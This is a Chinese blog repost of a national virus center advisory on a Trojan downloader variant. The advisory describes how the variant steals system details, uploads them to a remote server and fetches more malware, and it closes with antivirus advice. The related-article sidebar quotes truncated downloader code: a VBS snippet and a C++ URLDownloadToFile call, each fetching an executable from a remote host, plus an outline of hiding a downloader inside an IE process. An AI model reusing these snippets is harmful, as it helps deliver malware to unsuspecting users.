国家计算机病毒中心发现"木马下载器"新变种

最新推荐文章于 2021-03-29 14:39:51 发布
最新推荐文章于 2021-03-29 14:39:51 发布
阅读量593 收藏
点赞数
文章标签: 系统监控 互联网 web服务 防火墙 浏览器 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SPS113/article/details/6488767
版权

国家计算机病毒应急处理中心7日发布信息说,通过对互联网的监测发现,近期出现“木马下载器”(Trojan_Downloader)新变种,提醒用户小心谨防。

该变种运行后,会自我复制到受感染操作系统中指定的文件目录下,并将其重新命名后保存。随之,变种会在受感染操作系统的后台检索系统相关注册表项,在计算机用户不知情的情况下,秘密截获操作系统中各项资源信息,例如:防火墙、浏览器IE默认首页、防病毒软件、系统版本、网卡物理地址(MAC地址)、IP地址和系统软件等。

然后,变种会将截获到的系统信息利用加密方式上传到互联网络中指定的服务器上。恶意攻击者一旦掌握到这些系统信息,就会利用其对操作系统进行远程入侵攻击。

除此之外,变种会迫使受感染的操作系统主动连接访问互联网络中指定的Web服务器,下载其他木马、病毒等恶意程序。

专家建议已经感染该变种的用户应立即升级系统中的防病毒软件,进行全面杀毒。未感染的用户应打开系统中防病毒软件的“系统监控”功能,从注册表、系统进程、内存、网络等多方面对各种操作进行主动防御,这样可以第一时间监控未知病毒的入侵活动。

SPS113
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
走近计算机病毒
09-09
如果您对计算机病毒非常好奇,想跻身于非普通用户的“高手”行列,想深入研究计算机病毒,您可以选择此书。《走进计算机病毒》将让您知道一个病毒对计算机究竟做了哪些操作,从而找到针对相应病毒的正确对策。 如果您想成为一名病毒分析工程师,想跻身于真正的高手行列,真正做到“玩弄病毒于股掌之中”,并成为一名优秀的反病毒工程师,这需要各种综合知识的掌握和长期经验的积累,并不是学完几个章节就能够达到的。
木马下载Trojan-Downloader.Win32.Small.nkb
04-13 2432
捕获时间2008-04-12病毒症状该程序是使用VC编写的下载程序,由微点主动防御软件自动捕获,采用UPX加壳方式试图躲避特征码扫描,加壳后长度为8,704字节,图标为Windows默认可执行文件图标,病毒扩展名为exe,主要通过网页木马、文件捆绑的方式传播。病毒分析该木马程序被执行后,拷贝自身到%SystemRoot%/system32目录下,修改文件创建时间以及修改时间;通过API函数Crea
木马下载盗号数十种 破天木马剑指网游
Mitnick_2008的专栏
12-30 1037
木马下载20480”(Win32.TrojDownloader.wmTable.a.20480),这是一个下载者病毒。此病毒文件为muma.exe的可执行文件,但并不局限于该名称,病毒传播者也可能给它取别的名字。它会从指定的网址下载一份下载列表,下载并执行列表中的数十种盗号木马程序。       “破天木马1851”(Win32.PSWTroj.OnlineGames.nc.18515),该病
计 算 机 病 毒
09-18
计算机病毒的概念、特征和传播,预防病毒的操作方法、软件
计算机病毒大全 IT
04-28
初学者必备的文档..... 初学者必备的文档..... 初学者必备的文档.....
计算机病毒防治》期考试题(B卷).pdf
11-20
3. 正确的计算机病毒叙述是,反病毒软件需要不断升级以应对出现的病毒,选项C正确。其他选项如查杀任何病毒、病毒是破坏程序、受感染计算机有免疫力都是不准确的。 4. 常见的计算机病毒感染症状不包括打印时显示...
卡巴斯基系列病毒库备份(支持7.0及以下版本)
09-23
定期更病毒库对于保持防护的有效性至关重要,因为的威胁会不断出现,而旧的病毒也可能变种。 备份病毒库的主要目的是在无法连接到互联网时,或者网络环境不稳定时,确保能够及时应用最的防护数据。卡巴斯基...
计算机软硬件知识大全(二).pdf
10-12
计算机软硬件知识大全(二)涵盖了信息技术领域的重要概念,尤其是计算机病毒、蠕虫和木马的相关知识。这些恶意软件是网络安全的主要威胁,了解它们的工作原理和特性对于保护个人和组织的计算机系统至关重要。 首先,...
小心伪装成jpg图片文件的广告程序/木马下载
caobihole
07-14 398
endurer 原创2006-07-14 第1版 hxxp://sjzl.****9qian.com/上的图片文件 bb.jpg,会释放文件 setup.exe,采用 ASPack 加壳。 卡巴斯基报为:not-a-virus:AdWare.Win32.WSearch.g 江民KV报为:TrojanDownloader.Adload.hp...
vbs下载者和powershell下载
yiyefangzhou24的专栏
12-25 2316
vbs Set Post = CreateObject("Msxml2.XMLHTTP") Set Shell = CreateObject("Wscript.Shell") Post.Open "GET","http://IP/test.exe",0 Post.Send() Set aGet = CreateObject("ADODB.Stream") aGet.Mode = 3 aGet.T
下载木马(QQ尾巴生成
@涂涂博客
03-25 3390
链接:https://pan.baidu.com/s/1qs7o9wLKyRyfacTcK27acA 提取码:amcu
病毒下载 病毒样本
热门推荐
黑色雨滴
12-03 2万+
  简介:A-Z开头病毒样本打包下载,压缩文件内约7159个文件,约3573个病毒!看看各种杀毒软件能查出几个。验证一下查杀病毒的真正能力吧。仅供研究之用! 压缩包里面全部是病毒程序,千万不要解压运行。用你的杀毒软件查这个压缩包,如果查出的病毒数少于3542个的话,你还是换换杀毒软件吧。...
超级BT木马下载 Gameservet.exe的分析 game1.exe 8888-521ww.exe qjso.exe
飘的梦客厅
05-21 5521
  今天接到了一个叫Gameservet.exe的样本 测试了一下 测试结果真的让人震惊 这是个超级变态的木马下载当今流行的木马几乎都全了 而且最后还捣登出来个威金来 哎 现在的病毒都太厉害 那些无耻的制造病毒者 你们还让人活么?!越来越多的这类案例提示:每个用户应该做好自己系统的防护。不能仅仅指望一两款杀软保护自己系统的安全。对于病毒,防远重于杀。by baohe下面就说说测试过程:F
vc++编写一个木马下载,体积仅有0.3K
尹成的技术博客
03-29 3194
#include #pragma link "w32inet.lib" int main(){HRESULT hRet=URLDownloadToFile(0,"http://www.1111.com/abc.exe","d://abc.exe",0,0); if(hRet==S_OK) {         printf("Download OK!/n");} else {         p
VC无进程木马下载源码(利用IE隐藏进程)
Koma的主页
08-04 3234
  一、 打开半年前的一个工程,是利用IE来隐藏进程下载的实例,我想灰鸽子也是类似原理吧!       下面是程序的主要思路:       1.获取程序自身路径,启动IE进程       2.获取到IE进程句柄       3.分配内存       4.获取进程映像的地址       5.得到内存镜像大小       6.确定起始基址
一个比较难杀的木马下载 kndncso.exe jvxnypf.exe cmdbcs.exe lRAVWL.EXE
飘的梦客厅
05-18 2718
这是一个比较难杀的木马下载。可通过移动存贮介质传播。作者:baohe来源于:http://forum.ikaka.com/topic.asp?board=28&artid=8310697一、中毒后的SRENG日志:(注:中此毒后,SRENG须改名运行。原因见后述。)启动项目注册表[HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVer
记一次Emotet木马下载的分析
jxz_dz的博客
03-29 1450
Part 1: 简要流程: 1. Sub Document_open()执行代码调用O15ho2roxnv7ybuidx.H4b0154n64u 2.1 H4b0154n64u调用 Fl5n0bbcb9wio()返回值: "winmgmts:win32_Process" 2.2 H4b0154n64u 调用 W1ux0__6p4lqepk = CreateObject(G0yh3lf7156ae) 2.3 H4b0154n64u 调用 Set Nw0s5mi0i4948 = W7iyi.
穿过网络防火墙监视的木马下载(转)
cuankuangzhong6373的博客
03-14 452
7月5日:今日提醒用户特别注意以下病毒:“下载变种jk”(Win32.Troj.Downloader.jk)和“小魔女变种aa”(Win32.Hack.LittleWitch.aa)。   “下载变种jk”(Win32.Tr...
[视频教程] C语言全套视频教程(已更完毕
冷月宫主的专栏
11-05 1万+
迅雷下载地址:http://kuai.xunlei.com/d/YzE-FQJFPABHmMRT5ed 百度网盘打包下载地址:http://pan.baidu.com/s/1bn5txU3 密码: 9lgd 解压密码    www.zixue7.com 若地址失效,请联系管理员: 土豆豆单连载观看:http://www.tudou.com/lis
"计算机木马病毒的防治实践报告
通过对于《毕业综合实践报告-计算机木马病毒及防治(防治版).docx》的研究,本文旨在总结计算机木马病毒的特征、危害以及相应的防治措施。计算机木马病毒作为一种常见的网络安全威胁,对于数据和信息系统的安全造成了...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值